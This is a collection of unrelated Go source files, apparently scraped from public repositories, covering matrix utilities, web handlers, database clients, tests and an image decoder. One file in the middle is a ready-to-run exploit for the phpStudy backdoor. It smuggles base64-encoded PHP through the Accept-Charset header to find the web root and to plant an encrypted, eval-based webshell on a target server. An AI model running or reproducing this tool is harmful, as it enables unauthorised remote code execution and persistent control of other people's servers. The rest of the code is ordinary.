for j, v2 := range v1 {
if v2 == 0 {
row = append(row, i)
column = append(column, j)
}
}
}
nmn := make([][]int, len(mn)) // new m*n
for i := 0; i < len(mn); i++ {
nmn[i] = make([]int, len(mn[0]))
for j := 0; j < len(mn[0]); j++ {
if isIn(row, i) || isIn(column, j) {
nmn[i][j] = 0
continue
}
nmn[i][j] = mn[i][j]
}
}
return nmn
}
func isIn(is []int, i int) bool {
for _, v := range is {
if v == i {
return true
}
}
return false
}
func padding2(mn [][]int) [][]int {
row := make([]bool, len(mn))
column := make([]bool, len(mn[0]))
for i, v1 := range mn {
for j, v2 := range v1 {
if v2 == 0 {
row[i] = true
column[j] = true
}
}
}
for i := 0; i < len(mn); i++ {
for j := 0; j < len(mn[0]); j++ {
if row[i] || column[j] {
mn[i][j] = 0
continue
}
}
}
return mn
}
|
package utils
import (
"bytes"
"encoding/json"
"log"
"net/http"
)
func BuildMsg(id int64, url string, first string, send string, text string, time string, remark string) (msg *MsgTemplate) {
msg = &MsgTemplate{
URL: url,
Id: id,
Data: MsgData{
First: MsgVC{Value: first, Color: "#172177"},
Send: MsgVC{Value: send, Color: "#172177"},
Text: MsgVC{Value: text, Color: "#172177"},
Time: MsgVC{Value: time, Color: "#172177"},
},
}
if remark != "" {
msg.Data.Remark = MsgVC{Value: remark, Color: "#172177"}
}
return
}
func SendToGateway(url string, msg *MsgTemplate) (resp *http.Response, err error) {
b := new(bytes.Buffer)
err = json.NewEncoder(b).Encode(&msg)
if err != nil {
log.Fatalf("encode json error: %v\n", err)
}
log.Printf("%s\n", b)
resp, err = http.Post(url, "application/json; charset=utf-8", b)
log.Printf("resp is %v\n", resp)
return
}
|
package main
import (
"fmt"
"log"
"net/http"
"text/template"
)
var tpl *template.Template
func init() {
tpl = template.Must(template.ParseGlob("*.html"))
}
func main() {
http.HandleFunc("/", foo)
http.HandleFunc("/dog/", dog)
http.Handle("/assets/", http.StripPrefix("/assets", http.FileServer(http.Dir("./assets"))))
http.ListenAndServe(":8080", nil)
}
func foo(w http.ResponseWriter, r *http.Request) {
w.Header().Add("content-type", "text-html")
fmt.Fprintln(w, "<h1>This is the index action</h1>")
}
func dog(w http.ResponseWriter, r *http.Request) {
err := tpl.ExecuteTemplate(w, "dog.html", nil)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
log.Fatalln(err.Error())
}
}
|
// Copyright 2020 The Cockroach Authors.
//
// Licensed as a CockroachDB Enterprise file under the Cockroach Community
// License (the "License"); you may not use this file except in compliance with
// the License. You may obtain a copy of the License at
//
// https://github.com/cockroachdb/cockroach/blob/master/licenses/CCL.txt
package engineccl
import (
"sort"
"github.com/cockroachdb/cockroach/pkg/roachpb"
"github.com/cockroachdb/cockroach/pkg/storage"
"github.com/cockroachdb/cockroach/pkg/storage/enginepb"
"github.com/cockroachdb/errors"
)
// VerifyBatchRepr asserts that all keys in a BatchRepr are between the specified
// start and end keys and computes the enginepb.MVCCStats for it.
func VerifyBatchRepr(
repr []byte, start, end storage.MVCCKey, nowNanos int64,
) (enginepb.MVCCStats, error) {
// We store a 4 byte checksum of each key/value entry in the value. Make
// sure all the ones in this BatchRepr validate.
var kvs []storage.MVCCKeyValue
r, err := storage.NewRocksDBBatchReader(repr)
if err != nil {
return enginepb.MVCCStats{}, errors.Wrapf(err, "verifying key/value checksums")
}
for r.Next() {
switch r.BatchType() {
case storage.BatchTypeValue:
mvccKey, err := r.MVCCKey()
if err != nil {
return enginepb.MVCCStats{}, errors.Wrapf(err, "verifying key/value checksums")
}
v := roachpb.Value{RawBytes: r.Value()}
if err := v.Verify(mvccKey.Key); err != nil {
return enginepb.MVCCStats{}, err
}
kvs = append(kvs, storage.MVCCKeyValue{
Key: mvccKey,
Value: v.RawBytes,
})
default:
return enginepb.MVCCStats{}, errors.Errorf(
"unexpected entry type in batch: %d", r.BatchType())
}
}
if err := r.Error(); err != nil {
return enginepb.MVCCStats{}, errors.Wrapf(err, "verifying key/value checksums")
}
if len(kvs) == 0 {
return enginepb.MVCCStats{}, nil
}
sort.Slice(kvs, func(i, j int) bool {
return kvs[i].Key.Less(kvs[j].Key)
})
// Check the first and last keys for being within range.
if kvs[0].Key.Less(start) {
return enginepb.MVCCStats{}, errors.Errorf("key not in request range: %s", kvs[0].Key.String())
}
if end.Less(kvs[len(kvs)-1].Key) {
return enginepb.MVCCStats{}, errors.Errorf("key not in request range: %s", kvs[len(kvs)-1].Key.String())
}
// Generate an SST out of these kvs. Then, instantiate a MemSSTIterator.
var memFile storage.MemFile
writer := storage.MakeIngestionSSTWriter(&memFile)
for _, kv := range kvs {
if err := writer.Put(kv.Key, kv.Value); err != nil {
return enginepb.MVCCStats{}, err
}
}
if err := writer.Finish(); err != nil {
return enginepb.MVCCStats{}, err
}
writer.Close()
iter, err := storage.NewMemSSTIterator(memFile.Data(), false)
if err != nil {
return enginepb.MVCCStats{}, err
}
defer iter.Close()
return storage.ComputeStatsForRange(iter, start.Key, end.Key, nowNanos)
}
|
package leetcode
import "testing"
func TestTrie(t *testing.T) {
obj := Constructor()
obj.Insert("apple")
if !obj.Search("apple") {
t.Fail()
}
} |
package access
import (
"strconv"
"github.com/mikespook/gorbac"
"gopkg.in/mgo.v2"
"gopkg.in/mgo.v2/bson"
"github.com/mgalela/akses/db"
"github.com/mgalela/akses/utils"
)
var (
//AccessControl is mapping role and access control
Rbac *gorbac.RBAC
Roles map[int]*gorbac.StdRole
//Perms map[int]gorbac.Permission
)
//InitAccessControl initialise access control
func InitAccessControl() error {
Rbac = gorbac.New()
return populateAccessControl(Rbac)
}
func populateAccessControl(rbac *gorbac.RBAC) error {
Roles = make(map[int]*gorbac.StdRole)
//Perms = make(map[int]gorbac.Permission)
session, err := db.Session()
defer session.Close()
utils.Log.Info("Start populate access control")
if err != nil {
utils.Log.Error("failed to get DB session:", err)
return err
}
utils.Log.Debug("get group from DB")
groups := []Group{}
if err := db.UserGroup(session).Find(bson.M{}).All(&groups); err != nil {
if err != mgo.ErrNotFound {
utils.Log.Error("Failed to query DB")
return err
}
}
//add group and uri to rbac
utils.Log.Debug("Add group and uri to rbac")
for _, group := range groups {
Roles[group.Role] = gorbac.NewStdRole(strconv.Itoa(group.Role))
for _, val := range group.Apis {
//perm := gorbac.NewStdPermission(val.URI)
Roles[group.Role].Assign(gorbac.NewStdPermission(val.URI))
}
Rbac.Add(Roles[group.Role])
}
utils.Log.Info("End populate access control")
return nil
}
|
package main
import (
"log"
"net/http"
)
type robots struct {
URL string
}
func robotsHandler(w http.ResponseWriter, r *http.Request) {
rob := robots{
URL: "http://" + r.Host,
}
err := tmpl.ExecuteTemplate(w, "robots.tmpl", rob)
if err != nil {
log.Println(err)
}
}
|
// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at http://mozilla.org/MPL/2.0/
package jsonfeed
import (
"encoding/json"
"io"
"time"
)
const CurrentVersion = "https://jsonfeed.org/version/1"
type Item struct {
ID string `json:"id"`
URL string `json:"url"`
ExternalURL string `json:"external_url"`
Title string `json:"title"`
ContentHTML string `json:"content_html"`
ContentText string `json:"content_text"`
Summary string `json:"summary"`
Image string `json:"image"`
BannerImage string `json:"banner_image"`
DatePublished time.Time `json:"date_published"`
DateModified time.Time `json:"date_modified"`
Author Author `json:"author"`
Tags []string `json:"tags"`
}
type Author struct {
Name string `json:"name"`
URL string `json:"url"`
Avatar string `json:"avatar"`
}
type Hub struct {
Type string `json:"type"`
URL string `json:"url"`
}
type Attachment struct {
URL string `json:"url"`
MIMEType string `json:"mime_type"`
Title string `json:"title"`
SizeInBytes int64 `json:"size_in_bytes"`
DurationInSeconds int64 `json:"duration_in_seconds"`
}
type Feed struct {
Version string `json:"version"`
Title string `json:"title"`
HomePageURL string `json:"home_page_url"`
FeedURL string `json:"feed_url"`
Description string `json:"description"`
UserComment string `json:"user_comment"`
NextURL string `json:"next_url"`
Icon string `json:"icon"`
Favicon string `json:"favicon"`
Author Author `json:"author"`
Expired bool `json:"expired"`
Hubs []Hub `json:"hubs"`
Items []Item `json:"items"`
}
func Parse(r io.Reader) (Feed, error) {
var feed Feed
decoder := json.NewDecoder(r)
if err := decoder.Decode(&feed); err != nil {
return Feed{}, err
}
return feed, nil
}
|
// Copyright 2019 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package crostini
import (
"context"
"fmt"
"strings"
"time"
"chromiumos/tast/local/crostini"
"chromiumos/tast/testing"
)
func init() {
testing.AddTest(&testing.Test{
Func: PackageInfo,
LacrosStatus: testing.LacrosVariantUnneeded,
Desc: "Queries the information for a Debian package that we have copied into the container",
Contacts: []string{"clumptini+oncall@google.com"},
Attr: []string{"group:mainline"},
Data: []string{"package.deb"},
SoftwareDeps: []string{"chrome", "vm_host"},
Params: []testing.Param{
// Parameters generated by params_test.go. DO NOT EDIT.
{
Name: "buster_stable",
ExtraSoftwareDeps: []string{"dlc"},
ExtraHardwareDeps: crostini.CrostiniStable,
Fixture: "crostiniBuster",
Timeout: 7 * time.Minute,
}, {
Name: "buster_unstable",
ExtraAttr: []string{"informational"},
ExtraSoftwareDeps: []string{"dlc"},
ExtraHardwareDeps: crostini.CrostiniUnstable,
Fixture: "crostiniBuster",
Timeout: 7 * time.Minute,
}, {
Name: "bullseye_stable",
ExtraSoftwareDeps: []string{"dlc"},
ExtraHardwareDeps: crostini.CrostiniStable,
Fixture: "crostiniBullseye",
Timeout: 7 * time.Minute,
}, {
Name: "bullseye_unstable",
ExtraAttr: []string{"informational"},
ExtraSoftwareDeps: []string{"dlc"},
ExtraHardwareDeps: crostini.CrostiniUnstable,
Fixture: "crostiniBullseye",
Timeout: 7 * time.Minute,
},
},
})
}
func PackageInfo(ctx context.Context, s *testing.State) {
cont := s.FixtValue().(crostini.FixtureData).Cont
cr := s.FixtValue().(crostini.FixtureData).Chrome
filePath := fmt.Sprintf("/home/%s/package.deb", strings.Split(cr.NormalizedUser(), "@")[0])
if err := crostini.TransferToContainer(ctx, cont, s.DataPath("package.deb"), filePath); err != nil {
s.Fatal("Failed to transfer .deb to the container: ", err)
}
defer func() {
if err := crostini.RemoveContainerFile(ctx, cont, filePath); err != nil {
s.Fatal("Failed to remove .deb from the container: ", err)
}
}()
packageID, err := cont.LinuxPackageInfo(ctx, filePath)
if err != nil {
s.Fatal("Failed getting LinuxPackageInfo: ", err)
}
if !strings.HasPrefix(packageID, "cros-tast-tests;") {
s.Fatal("LinuxPackageInfo returned an incorrect package id: ", packageID)
}
s.Log("Package ID: " + packageID)
}
|
package gedis
import (
"bufio"
"fmt"
"net"
)
// Connection ...
type Connection struct {
conn net.Conn
reader *bufio.Reader
writer *bufio.Writer
}
func newConnection(conn net.Conn) *Connection {
reader := bufio.NewReader(conn)
writer := bufio.NewWriter(conn)
return &Connection{
conn: conn,
reader: reader,
writer: writer,
}
}
// WriteSimpleString ...
func (c *Connection) WriteSimpleString(msg string) {
c.writer.WriteString(simpleString(msg))
c.writer.Flush()
}
// Close ...
func (c *Connection) Close() error {
return c.conn.Close()
}
func simpleString(str string) string {
return fmt.Sprintf("+%s\r\n", str)
}
|
// SPDX-License-Identifier: ISC
// Copyright (c) 2014-2020 Bitmark Inc.
// Use of this source code is governed by an ISC
// license that can be found in the LICENSE file.
package reservoir
import (
"bytes"
"encoding/binary"
"github.com/bitmark-inc/bitmarkd/account"
"github.com/bitmark-inc/bitmarkd/merkle"
"github.com/bitmark-inc/bitmarkd/storage"
"github.com/bitmark-inc/logger"
)
// BalanceInfo - result returned by store share
type BalanceInfo struct {
ShareId merkle.Digest `json:"shareId"`
Confirmed uint64 `json:"confirmed"`
Spend uint64 `json:"spend"`
Available uint64 `json:"available"`
}
// shareBalance - get a list of balances
func shareBalance(owner *account.Account, startShareId merkle.Digest, count int, pool storage.Handle) ([]BalanceInfo, error) {
ownerBytes := owner.Bytes()
prefix := append(ownerBytes, startShareId[:]...)
cursor := pool.NewFetchCursor().Seek(prefix)
items, err := cursor.Fetch(count)
if nil != err {
return nil, err
}
records := make([]BalanceInfo, 0, len(items))
loop:
for _, item := range items {
n := len(item.Key)
split := n - len(startShareId)
if split <= 0 {
logger.Panicf("split cannot be <= 0: %d", split)
}
itemOwner := item.Key[:n-len(startShareId)]
if !bytes.Equal(ownerBytes, itemOwner) {
break loop
}
value := binary.BigEndian.Uint64(item.Value[:8])
var shareId merkle.Digest
copy(shareId[:], item.Key[split:])
spendKey := makeSpendKey(owner, shareId)
globalData.RLock()
spend := globalData.spend[spendKey]
globalData.RUnlock()
records = append(records, BalanceInfo{
ShareId: shareId,
Confirmed: value,
Spend: spend,
Available: value - spend,
})
}
return records, nil
}
|
package main
import (
"encoding/base64"
"flag"
"fmt"
"net/http"
"os"
"strings"
"github.com/PuerkitoBio/goquery"
)
func httpDo(url string, file string, wwwroot string) {
client := &http.Client{}
shell := `
<?php
@error_reporting(0);
session_start();
if (isset($_GET['help']))
{
$key=substr(md5(uniqid(rand())),16);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __construct($p) {eval($p."");}}
@new C($params);
}
?>
`
payload := "file_put_contents(\"" + wwwroot + "/" + file + "\"," + shell + ");"
fmt.Println(payload)
str := []byte(payload)
payloads := base64.StdEncoding.EncodeToString(str)
req, err := http.NewRequest("GET", url+"/index.php", nil)
if err != nil {
fmt.Println("主机可能不存活!!")
os.Exit(0)
}
req.Header.Set("Accept", "*/*")
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36")
req.Header.Set("Accept-Encoding", "gzip,deflate")
req.Header.Set("accept-charset", payloads)
req.Header.Set("Connection", "keep-alive")
resp, err := client.Do(req)
if err != nil {
fmt.Println("主机可能不存活")
} else {
defer resp.Body.Close()
}
shellurl := url + "/" + file
reqshell, err := http.Get(shellurl)
if err != nil {
fmt.Println("上传失败")
return
} else {
fmt.Println("上传成功, webshell地址:" + shellurl)
}
defer reqshell.Body.Close()
}
func main() {
var url string
// var password string
var file string
flag.StringVar(&url, "u", "", "http(s)://url")
// flag.StringVar(&password, "p", "pass", "webshell's password")
flag.StringVar(&file, "f", "webshell.php", "webshell's filename")
flag.Parse()
if url == "" {
fmt.Println("use : phpstudy_webshell.exe -f webshell's filename -p webshell's password")
os.Exit(0)
}
wwwroot := getroot(url)
httpDo(url, file, wwwroot)
}
//获取网站目录,goquery应该有更简单的方法获取table的值
func getroot(url string) string {
var list []string
var wwwroot string
client := &http.Client{}
req, err := http.NewRequest("GET", url+"/index.php", nil)
if err != nil {
fmt.Println("主机可能不存活!!")
os.Exit(0)
}
req.Header.Set("Accept", "*/*")
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36")
req.Header.Set("Accept-Encoding", "gzip,deflate")
req.Header.Set("accept-charset", "cGhwaW5mbygpOw==")
req.Header.Set("Connection", "keep-alive")
resp, err := client.Do(req)
defer resp.Body.Close()
body, _ := goquery.NewDocumentFromReader(resp.Body)
body.Find("td").Each(func(i int, selection *goquery.Selection) {
list = append(list, strings.TrimSpace(selection.Text()))
})
for i, text := range list {
if text == "DOCUMENT_ROOT" || text == "_SERVER[\"DOCUMENT_ROOT\"]" {
fmt.Println("路径:" + list[i+1])
wwwroot = list[i+1]
break
}
}
return wwwroot
}
|
package main
import "testing"
func TestAnswerComparisonWellFormed(t *testing.T){
// it should accept well formed strings
wfInput := "Buenos Aires"
wfAnswer := "Buenos Aires"
if got := compareAnswers(wfInput, wfAnswer); got != true {
t.Errorf("compareAnswers(%s, %s) = %v, want %v", wfInput, wfAnswer, got, true)
}
}
func TestAnswerComparisonBadlyFormed(t *testing.T){
// it should accept well formed strings
wfInput := " Buenos Aires"
wfAnswer := "Buenos Aires "
if got := compareAnswers(wfInput, wfAnswer); got != true {
t.Errorf("compareAnswers(%s, %s) = %v, want %v", wfInput, wfAnswer, got, true)
}
}
|
package problem0044
func isMatch(s string, p string) bool {
ls, lp := len(s), len(p)
dp := [][]bool{}
for i := 0; i < ls+1; i++ {
rt := make([]bool, lp+1)
dp = append(dp, rt)
}
// dp[i][j] == true 意味着,s[:i+1] 可以和 p[:j+1] 匹配
dp[0][0] = true
for j := 1; j <= lp; j++ {
if p[j-1] == '*' {
// 当 p[j-1] == '*' 时
// 只要前面的匹配,dp[0][j] 就匹配
// 一旦 p[j-1] != '*',后面的 dp[0][j] 就都为 false
dp[0][j] = dp[0][j-1]
}
}
for i := 1; i <= ls; i++ {
for j := 1; j <= lp; j++ {
if p[j-1] != '*' {
// 当 p[j-1] != '*' 时
// 单个字符要匹配,并且之前的字符串也要匹配。
dp[i][j] = (p[j-1] == s[i-1] || p[j-1] == '?') && dp[i-1][j-1]
} else {
// 当 p[j-1] == '*' 时
// 要么,dp[i-1][j] == true,意味着,
// 当 s[:i] 与 p[:j+1] 匹配,且p[j] == '*' 的时候,
// s[:i] 后接任意字符串的 s[:i+1] 仍与 p[:j+1] 匹配。
// 要么,dp[i][j-1] == true,意味着,
// 当 s[:i+1] 与 p[:j] 匹配后
// 在 p[:j] 后添加'*',s[:i+1] 与 p[:j+1] 任然匹配
// 因为, '*' 可以匹配空字符。
dp[i][j] = dp[i-1][j] || dp[i][j-1]
}
}
}
return dp[ls][lp]
}
|
package controller
import (
"github.com/gin-gonic/gin"
"net/http"
"strconv"
"xpool/models"
)
var Income income = income{}
type income struct{}
func (u *income) IncomeTotal(c *gin.Context) {
token := c.PostForm("token")
c.JSON(http.StatusOK, IncomeTotalServices(token))
}
func (u *income) IncomeBalance(c *gin.Context) {
token := c.PostForm("token")
c.JSON(http.StatusOK, IncomeBalanceServices(token))
}
func (u *income) ExtractIncomeBalance(c *gin.Context) {
value := c.PostForm("value")
token := c.PostForm("token")
password := c.PostForm("password")
c.JSON(http.StatusOK, ExtractIncomeBalanceServices(token, value, password))
}
func (u *income) ExtractIncomeList(c *gin.Context) {
page := c.PostForm("page")
pageSize := c.PostForm("pageSize")
token := c.PostForm("token")
c.JSON(http.StatusOK, ExtractIncomeListServices(page, pageSize, token))
}
func (u *income) AdminExtractIncomeList(c *gin.Context) {
page := c.PostForm("page")
pageSize := c.PostForm("pageSize")
token := c.PostForm("token")
c.JSON(http.StatusOK, AdminExtractIncomeListServices(page, pageSize, token))
}
func (u *income) ExtractIncomeReview(c *gin.Context) {
reviewId := c.PostForm("reviewId")
reason := c.PostForm("reason")
token := c.PostForm("token")
password := c.PostForm("password")
statesStr := c.PostForm("states")
c.JSON(http.StatusOK, ExtractIncomeReviewServices(reviewId, reason, token, password, statesStr))
}
func IncomeTotalServices(token string) Response {
userInfo := GetUserInfoByToken(token)
if "" == userInfo.Email {
return ResponseFun("token 无效", 40000)
}
getIncomeInfoById := models.GetIncomeInfoById(userInfo.Email)
return ResponseFun(Decimal(getIncomeInfoById.TotalIncome), 200)
}
func IncomeBalanceServices(token string) Response {
userInfo := GetUserInfoByToken(token)
if "" == userInfo.Email {
return ResponseFun("token 无效", 40002)
}
getIncomeInfoById := models.GetIncomeInfoById(userInfo.Email)
return ResponseFun(Decimal(getIncomeInfoById.IncomeBalance), 200)
}
func ExtractIncomeBalanceServices(token, valueStr, password string) Response {
userInfo := GetUserInfoByToken(token)
if "" == userInfo.Address {
return ResponseFun("获取地址失败", 20026)
}
if !CheckPassword(token, password) {
return ResponseFun("密码错误", 20028)
}
value, err := strconv.ParseFloat(valueStr, 64)
if nil != err {
return ResponseFun("提取金额错误", 20030)
}
GetIncomeInfo := models.GetIncomeInfoById(userInfo.Email)
balance := Round(GetIncomeInfo.IncomeBalance-value, 3)
if 0 > balance {
return ResponseFun("余额不足", 20032)
}
result := models.SaveIncome(1, userInfo.Email, value, balance, userInfo.Id)
if true != result {
return ResponseFun("申请提取余额失败", 20034)
}
return ResponseFun("申请提取余额成功", 200)
}
type IncomeList struct {
ExtractIncome []models.ExtractIncome `json:"extract_income"`
Page int `json:"page"`
PageSize int `json:"pageSize"`
Total int `json:"total"`
}
func ExtractIncomeListServices(pageStr, pageSizeStr, token string) Response {
userInfo := GetUserInfoByToken(token)
if "" == userInfo.Email {
return ResponseFun("token 无效", 20014)
}
page, err := strconv.Atoi(pageStr)
if nil != err {
page = 1
}
pageSize, err := strconv.Atoi(pageSizeStr)
if nil != err {
pageSize = 100
}
if 0 >= page {
page = 1
}
if 100 < pageSize {
pageSize = 100
}
return ResponseFun(IncomeList{
ExtractIncome: models.GetExtractIncomeListByEmail(userInfo.Email, page, pageSize),
Page: page,
PageSize: pageSize,
Total: models.GetExtractIncomeCountByEmail(userInfo.Email),
}, 200)
}
func ExtractIncomeReviewServices(reviewId, reason, token, password, statesStr string) Response {
userInfo := GetUserInfoByToken(token)
states, err := strconv.Atoi(statesStr)
if nil != err {
return ResponseFun("参数错误", 20024)
}
if 3 != states && 5 != states {
return ResponseFun("参数错误", 20026)
}
if "" == userInfo.Email {
return ResponseFun("token 无效", 20016)
}
if !VerifyAdminRole(userInfo) {
return ResponseFun("无权限操作", 20018)
}
if !CheckPassword(token, password) {
return ResponseFun("密码错误", 20020)
}
extractIncomeInfo := models.GetExtractIncomeInfoById(reviewId)
if 1 != extractIncomeInfo.State {
return ResponseFun("操作错误", 20022)
}
incomeInfo := models.GetIncomeInfoById(extractIncomeInfo.Email)
var value float64
if 5 == states {
value = extractIncomeInfo.Value + incomeInfo.IncomeBalance
}
result := models.UpdateExtractIncome(states, value, reason, extractIncomeInfo.Email, extractIncomeInfo.ID, userInfo.Id)
if true == result {
return ResponseFun("审核成功", 200)
} else {
return ResponseFun("审核失败", 20024)
}
} |
package taosTool
import (
"database/sql"
"fmt"
_ "github.com/satng/sensors-gateway-grpc/taosSql"
"os"
"time"
)
const (
CONNDB = "%s:%s@/tcp(%s)/%s"
DRIVER = "taosSql"
DBHOST = "127.0.0.1"
DBUSER = "root"
DBPASS = "taosdata"
DBNAME = "sensors_test"
)
var (
globalDB *sql.DB
)
func InitDB() {
// open connect to taos server
connStr := fmt.Sprintf(CONNDB, DBUSER, DBPASS, DBHOST, DBNAME)
db, err := sql.Open(DRIVER, connStr)
if err != nil {
fmt.Println("Open database error: %s\n", err)
os.Exit(0)
}
globalDB = db
_, err = globalDB.Exec("use " + DBNAME)
checkErr(err)
fmt.Println("Taos database ok")
}
func CloseDB() {
globalDB.Close()
}
func Insert(sql string) {
st := time.Now().Nanosecond()
res, err := globalDB.Exec(sql)
if err != nil {
fmt.Println(err.Error())
return
}
affected, err := res.RowsAffected()
if err != nil {
fmt.Println(err.Error())
return
}
et := time.Now().Nanosecond()
fmt.Printf("insert data result:\n %d row(s) affectd (%6.6fs)\n\n", affected, (float32(et-st))/1E9)
}
func checkErr(err error) {
if err != nil {
panic(err)
}
}
|
package jenkinsbinding
import (
"log"
devopsv1alpha1 "alauda.io/devops-apiserver/pkg/apis/devops/v1alpha1"
devopsclient "alauda.io/devops-apiserver/pkg/client/clientset/versioned"
"alauda.io/diablo/src/backend/api"
"alauda.io/diablo/src/backend/errors"
"alauda.io/diablo/src/backend/resource/common"
"alauda.io/diablo/src/backend/resource/dataselect"
"k8s.io/client-go/kubernetes"
)
// JenkinsBindingList contains a list of jenkins in the cluster.
type JenkinsBindingList struct {
ListMeta api.ListMeta `json:"listMeta"`
// Unordered list of JenkinsBinding.
Items []JenkinsBinding `json:"jenkinsbindings"`
// List of non-critical errors, that occurred during resource retrieval.
Errors []error `json:"errors"`
}
// JenkinsBinding is a presentation layer view of Kubernetes namespaces. This means it is namespace plus
// additional augmented data we can get from other sources.
type JenkinsBinding struct {
ObjectMeta api.ObjectMeta `json:"objectMeta"`
TypeMeta api.TypeMeta `json:"typeMeta"`
Spec devopsv1alpha1.JenkinsBindingSpec `json:"spec"`
Status devopsv1alpha1.JenkinsBindingStatus `json:"status"`
}
type APIResponse struct {
Data CronCheckResult `json:"data"`
Status string `json:"status"`
}
type CronCheckResult struct {
Next string `json:"next"`
Previous string `json:"previous"`
SanityZh string `json:"sanity_zh_cn"`
SanityEn string `json:"sanity_en"`
Error string `json:"error"`
}
// // GetProjectListFromChannels returns a list of all namespaces in the cluster.
// func GetProjectListFromChannels(channels *common.ResourceChannels, dsQuery *dataselect.DataSelectQuery) (*JenkinsBindingList, error) {
// jenkins := <-channels.JenkinsBindingList.List
// err := <-channels.JenkinsBindingList.Error
// nonCriticalErrors, criticalError := errors.HandleError(err)
// if criticalError != nil {
// return nil, criticalError
// }
// return toJenkinsBindingList(jenkins.Items, nil, nonCriticalErrors, dsQuery), nil
// }
// GetJenkinsBindingList returns a list of all namespaces in the cluster.
func GetJenkinsBindingList(client devopsclient.Interface, k8sclient kubernetes.Interface,
namespace *common.NamespaceQuery, dsQuery *dataselect.DataSelectQuery) (*JenkinsBindingList, error) {
log.Println("Getting list of jenkins")
jenkinsList, err := client.DevopsV1alpha1().JenkinsBindings(namespace.ToRequestParam()).List(api.ListEverything)
if err != nil {
log.Println("error while listing jenkins", err)
}
nonCriticalErrors, criticalError := errors.HandleError(err)
if criticalError != nil {
return nil, criticalError
}
return toJenkinsBindingList(jenkinsList.Items, nonCriticalErrors, dsQuery), nil
}
func toJenkinsBindingList(jenkins []devopsv1alpha1.JenkinsBinding, nonCriticalErrors []error, dsQuery *dataselect.DataSelectQuery) *JenkinsBindingList {
jenkinsList := &JenkinsBindingList{
Items: make([]JenkinsBinding, 0),
ListMeta: api.ListMeta{TotalItems: len(jenkins)},
}
jenkinsCells, filteredTotal := dataselect.GenericDataSelectWithFilter(toCells(jenkins), dsQuery)
jenkins = fromCells(jenkinsCells)
jenkinsList.ListMeta = api.ListMeta{TotalItems: filteredTotal}
jenkinsList.Errors = nonCriticalErrors
for _, jenk := range jenkins {
jenkinsList.Items = append(jenkinsList.Items, toJenkinsBinding(jenk))
}
return jenkinsList
}
func toJenkinsBinding(jenkins devopsv1alpha1.JenkinsBinding) JenkinsBinding {
jenk := JenkinsBinding{
ObjectMeta: api.NewObjectMeta(jenkins.ObjectMeta),
TypeMeta: api.NewTypeMeta(api.ResourceKindJenkinsBinding),
// data here
Spec: jenkins.Spec,
Status: jenkins.Status,
}
if jenk.ObjectMeta.Annotations == nil {
jenk.ObjectMeta.Annotations = make(map[string]string, 0)
}
jenk.ObjectMeta.Annotations[common.AnnotationsKeyToolType] = devopsv1alpha1.ToolChainContinuousIntegrationName
jenk.ObjectMeta.Annotations[common.AnnotationsKeyToolItemKind] = devopsv1alpha1.ResourceKindJenkins
jenk.ObjectMeta.Annotations[common.AnnotationsKeyToolItemType] = ""
jenk.ObjectMeta.Annotations[common.AnnotationsKeyToolItemPublic] = "false"
return jenk
}
|
// Copyright 2020 Adobe. All rights reserved.
// This file is licensed to you under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License. You may obtain a copy
// of the License at http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software distributed under
// the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
// OF ANY KIND, either express or implied. See the License for the specific language
// governing permissions and limitations under the License.
package ims
import (
"net/url"
)
type Config struct {
URL string
ClientID string
ClientSecret string
ServiceToken string
PrivateKeyPath string
Organization string
Account string
Scopes []string
Metascopes []string
AccessToken string
RefreshToken string
DeviceToken string
AuthorizationCode string
ProfileApiVersion string
OrgsApiVersion string
Timeout int
ProxyURL string
ProxyIgnoreTLS bool
UserID string
}
type TokenInfo struct {
AccessToken string
Expires int //(response.ExpiresIn * time.Millisecond),
Valid bool
Info string
}
func validateURL(u string) bool {
parsedURL, err := url.Parse(u)
if err != nil {
return false
}
switch {
case parsedURL.Scheme == "":
return false
case parsedURL.Host == "":
return false
default:
return true
}
}
|
// Copyright (C) 2017 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package image
import (
"bytes"
"github.com/google/gapid/core/data/binary"
"github.com/google/gapid/core/data/endian"
"github.com/google/gapid/core/math/sint"
"github.com/google/gapid/core/os/device"
)
func init() {
RegisterConverter(S3_DXT1_RGB, RGBA_U8_NORM, func(src []byte, w, h, d int) ([]byte, error) {
return decode4x4Blocks(src, w, h, d, func(r binary.Reader, dst []pixel) {
decodeDXT1(r, dst, func(p *pixel) {
p.setToBlackRGB()
})
})
})
RegisterConverter(S3_DXT1_RGBA, RGBA_U8_NORM, func(src []byte, w, h, d int) ([]byte, error) {
return decode4x4Blocks(src, w, h, d, func(r binary.Reader, dst []pixel) {
decodeDXT1(r, dst, func(p *pixel) {
p.setToBlackRGBA()
})
})
})
RegisterConverter(S3_DXT3_RGBA, RGBA_U8_NORM, func(src []byte, w, h, d int) ([]byte, error) {
return decode4x4Blocks(src, w, h, d, func(r binary.Reader, dst []pixel) {
decodeAlphaDXT3(r, dst)
decodeColorDXT3_5(r, dst)
})
})
RegisterConverter(S3_DXT5_RGBA, RGBA_U8_NORM, func(src []byte, w, h, d int) ([]byte, error) {
